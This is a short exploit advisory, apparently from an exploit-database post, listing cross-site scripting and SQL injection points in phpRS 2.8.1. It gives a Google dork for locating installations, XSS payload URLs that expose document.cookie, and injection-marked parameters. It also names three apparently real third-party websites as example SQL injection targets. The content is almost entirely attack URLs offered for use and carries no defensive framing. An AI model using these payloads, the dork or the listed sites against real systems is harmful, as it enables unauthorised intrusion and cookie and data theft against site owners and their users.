# Exploit Title: phpRS Multiple Vulnerabilities
# Google Dork: powered by phpRS
# Date: 2011-sep-18
# Author: iM4n
# Software Link: http://www.supersvet.cz/download.php
# Version: 2.8.1
# Tested on: FreeBSD - Cent OS

ŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁ
*/ Cross Site Scripting:

 http://Target/phpRS Path/view.php?cisloclanku=1%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

 http://Target/phpRS Path/search.php?rstema=%3Cbody%20onload%3dalert%28document.cookie%29%3E&rstext=all-phpRS-all&rsvelikost=sab


ŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁ
ŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁ
*/ Sql Injection:

 http://Target/phpRS Path/?strana=%24%7binjecthere%7d

 http://Target/phpRS Path/index.php?strana=%24%7binjecthere%7d

 http://Target/phpRS Path/search.php?rstema=%24%7binjecthere%7d&rstext=all-phpRS-all&rsvelikost=sab

 http://Target/phpRS Path/search.php?rstema=7&rstext=all-phpRS-all&rsvelikost=sab&stromhlmenu=%24%7binjecthere%7d

˝˝˝˝˝˝˝˝˝˝˝˝˝˝˝˝˝˝˝˝˝˝˝˝˝˝˝˝˝˝˝˝˝˝˝˝˝˝˝˝˝˝˝˝˝˝˝˝˝˝˝˝˝˝˝˝˝˝˝˝˝˝˝˝˝˝˝˝˝˝˝˝
Example:

http://www.phonet.sk/en/search.php?rsvelikost=sab&rstext=all-phpRS-all&rstema=7[sqli]&stromhlmenu=3[sqli]

http://www.sevencz.cz/search.php?rsvelikost=sab&rstext=all-phpRS-all&rstema=[sqli]

http://www.instar.cz/en/search.php?rsvelikost=sab&rstext=all-phpRS-all&rstema=[sqli]

ŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁŁ

Emperor Never Die
 
iM4n - Spyn3t - 777 - Cl4w - ***3 


Greetz to: Shabgard Security Group - Zombies Underground & all my friends